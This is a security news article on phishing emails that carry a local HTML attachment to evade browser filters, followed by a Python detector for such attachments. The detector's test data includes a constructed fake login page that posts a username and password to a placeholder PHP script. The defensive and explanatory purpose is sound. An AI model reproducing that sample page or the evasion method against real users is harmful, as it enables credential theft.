Next-generation phishing HTML scam dissected

According to Rodel Mendrez, in a traditional phishing email, the hacker sets up a website with a fake login form imitating a legitimate online service, such as a bank.

Phishers, he says, have discovered ways of circumventing the in-browser phishing detection systems seen on Firefox and Chrome, by attaching an HTML file to the spam email.

"This system avoids the HTTP GET request to the phishing site, thus avoiding being blocked by the browser", he notes in his security blog.

In use, says Mendrez, the HTML attachment, stored locally, successfully opens in the browser without the user being warned.

"When the victims enter their information and click the 'Agree and Submit' button, the HTML form sends the stolen information through a POST request to a PHP script hosted on a hacked legitimate webserver", he says.

And here's where it gets interesting, Infosecurity notes, as whilst the resultant POST request sends information to the phisher's remote web server, Chrome and Firefox do not detect any malicious activity.

So what makes this type of phishing tactic harder to detect from the browser perspective, asks Mendrez.

The reasons, he says, are that few of these PHP URLs are ever reported as abuse, and that the URLs themselves are difficult to verify as phishing sites.

"The URL alone – without the accompanying HTML form – would be hard to verify as a phish site because the PHP script runs in the server and no visible HTML is displayed after clicking the submit button, other than redirecting the browser elsewhere to the target brand's homepage", he says.
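Because the collecting script lives on a hacked legitimate server and returns no visible page, a URL reputation lookup is a weak signal for this tactic. A mail gateway or analyst can instead key on what the attachment itself contains: a form that posts credential-style fields to an absolute http(s) URL. The following triage check is an added example written for this article; it is not code from Mendrez's blog or from Infosecurity Magazine. The sample attachment embedded in it is constructed, and the hostname and script path inside it are placeholders rather than real indicators.

```python
"""Triage check for HTML e-mail attachments: flag a local HTML file whose
<form> posts credential-style fields to a remote script.

Added example, not code from the blog post or the magazine article.
The sample attachment below is constructed; the hostname and script path
in it are placeholders, not real indicators.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Substrings of input names that commonly carry credentials or card data.
SENSITIVE_NAMES = ("pass", "pwd", "pin", "ssn", "card", "cvv", "account")


class FormScanner(HTMLParser):
    """Collect every <form> with its action/method and the inputs it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # bare attributes (no value) come through as None
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"type": (a.get("type") or "text").lower(),
                                            "name": (a.get("name") or "").lower()})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_remote(action):
    """True when the form action is an absolute http(s) URL, i.e. it leaves the
    local file and sends data to some host on the network."""
    u = urlparse(action)
    return u.scheme in ("http", "https") and bool(u.netloc)


def is_sensitive(field):
    return field["type"] == "password" or any(k in field["name"] for k in SENSITIVE_NAMES)


def scan_html_attachment(html):
    """Return one finding per form that posts credential-style fields to a
    remote script; an empty list means nothing was flagged."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        sensitive = [f["name"] for f in form["inputs"] if is_sensitive(f)]
        if is_remote(form["action"]) and sensitive:
            target = urlparse(form["action"])
            findings.append({"host": target.netloc, "path": target.path,
                             "method": form["method"],
                             "credential_fields": sensitive})
    return findings


# Constructed sample: a fake login page saved as an attachment, posting to a
# PHP script on a placeholder host (not a real indicator).
SAMPLE_ATTACHMENT = """
<html><body>
<h2>Please confirm your account details</h2>
<form method="POST" action="http://compromised.example/images/login.php">
  <input type="text" name="UserID">
  <input type="password" name="Password">
  <input type="submit" value="Agree and Submit">
</form>
</body></html>
"""

# Constructed benign control: a password form whose action is a relative path,
# so it never leaves the document it was served with.
BENIGN_LOCAL_FORM = '<form method="post" action="/login"><input type="password" name="pw"></form>'


if __name__ == "__main__":
    for finding in scan_html_attachment(SAMPLE_ATTACHMENT):
        print("FLAG: credential form posting to", finding["host"], finding["path"],
              "via", finding["method"].upper(), "fields:", finding["credential_fields"])
    print("benign control flagged:", bool(scan_html_attachment(BENIGN_LOCAL_FORM)))
```

The check deliberately ignores the reputation of the host in the action URL: as the article explains, the receiving script sits on an otherwise legitimate server, so the combination of a locally stored HTML file, an absolute POST target and password-type inputs is the signal worth alerting on, with the parsed host and path attached to the alert for follow-up.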

Mendrez concludes that his team has seen an increase in these types of phishing spam campaigns over the last few months and, as a result, advises caution when encountering any HTML form asking for sensitive information.
